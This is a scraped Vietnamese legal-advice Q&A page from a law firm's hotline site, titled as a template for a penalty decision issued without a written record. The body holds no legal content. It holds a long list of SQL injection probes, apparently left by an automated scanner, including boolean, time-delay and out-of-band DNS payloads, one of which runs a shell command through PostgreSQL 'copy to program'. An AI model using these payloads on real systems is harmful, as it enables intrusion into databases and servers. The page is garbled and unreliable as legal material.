Bạn cần tư vấn Pháp luật?
Hãy gọi : 1900 6188
"Tổng đài tư vấn pháp luật 1900 6188" là dịch vụ tư vấn luật qua điện thoại của Công ty Luật VinaBiz
  • Tư vấn trực tuyến miễn phí
  • Đội ngũ Luật sư uy tín
  • Tư vấn 24/7
Luật sư tư vấn pháp luật online miễn phí đầu số 1900 6188

Mẫu quyết định xử phạt trường hợp không lập biên bản

Cập nhật lần cuối lúc 16:08 ngày 09/05/2014

  • Trả lời (48)
  • Chuyên gia trả lời

Mẫu quyết định xử phạt trường hợp không lập biên bản

Nguồn: vinalaf.com.vn
1
1
1
1
1'"
-1 OR 2+988-988-1=0+0+0+1 --
\
-1 OR 3+988-988-1=0+0+0+1 --
1
@@u680n
JyI=
-1 OR 3*2<(0+5+988-988) --
-1 OR 3*2>(0+5+988-988) --
-1 OR 2+913-913-1=0+0+0+1
-1 OR 3+913-913-1=0+0+0+1
-1 OR 3*2<(0+5+913-913)
-1 OR 3*2>(0+5+913-913)
-1' OR 2+590-590-1=0+0+0+1 --
-1' OR 3+590-590-1=0+0+0+1 --
-1' OR 3*2<(0+5+590-590) --
-1' OR 3*2>(0+5+590-590) --
-1' OR 2+839-839-1=0+0+0+1 or 'fKwRzt7W'='
-1' OR 3+839-839-1=0+0+0+1 or 'fKwRzt7W'='
-1' OR 3*2<(0+5+839-839) or 'fKwRzt7W'='
-1' OR 3*2>(0+5+839-839) or 'fKwRzt7W'='
-1" OR 2+528-528-1=0+0+0+1 --
-1" OR 3+528-528-1=0+0+0+1 --
-1" OR 3*2<(0+5+528-528) --
-1" OR 3*2>(0+5+528-528) --
if(now()=sysdate(),sleep(12.329999999999998),0)/*'XOR(if(now()=sysdate(),sleep(12.329999999999998),0))OR'"XOR(if(now()=sysdate(),sleep(12.329999999999998),0))OR"*/
(select(0)from(select(sleep(12.329999999999998)))v)/*'+(select(0)from(select(sleep(12.329999999999998)))v)+'"+(select(0)from(select(sleep(12.329999999999998)))v)+"*/
-1; waitfor delay '0:0:4.109999999999999' --
-1); waitfor delay '0:0:4.109999999999999' --
1 waitfor delay '0:0:4.109999999999999' --
D6v3hHz9'; waitfor delay '0:0:4.109999999999999' --
-1;select pg_sleep(8.219999999999998); --
-1);select pg_sleep(8.219999999999998); --
-1));select pg_sleep(12.329999999999998); --
aSg8sxX6';select pg_sleep(12.329999999999998); --
ljUo2ezg');select pg_sleep(4.109999999999999); --
79lslS5u'));select pg_sleep(4.109999999999999); --
1||UTL_INADDR.get_host_address('dns.'||'sqli.027931.34060-5493.34060.d316d.1.bxss'||'.me')
'||UTL_INADDR.get_host_address('dns.'||'sqli.027931.34060-5494.34060.d316d.1.bxss'||'.me')||'
1;copy (select '') to program 'nslookup dns.sqli.\027931.34060-5495.34060.d316d.\1.bxss.me'
1';copy (select '') to program 'nslookup dns.sqli.\027931.34060-5497.34060.d316d.\1.bxss.me
280'

Tư vấn pháp luật online miễn phí đầu số 1900 6188

Đặt câu hỏi

Họ tên:
Email:
Tiêu đề: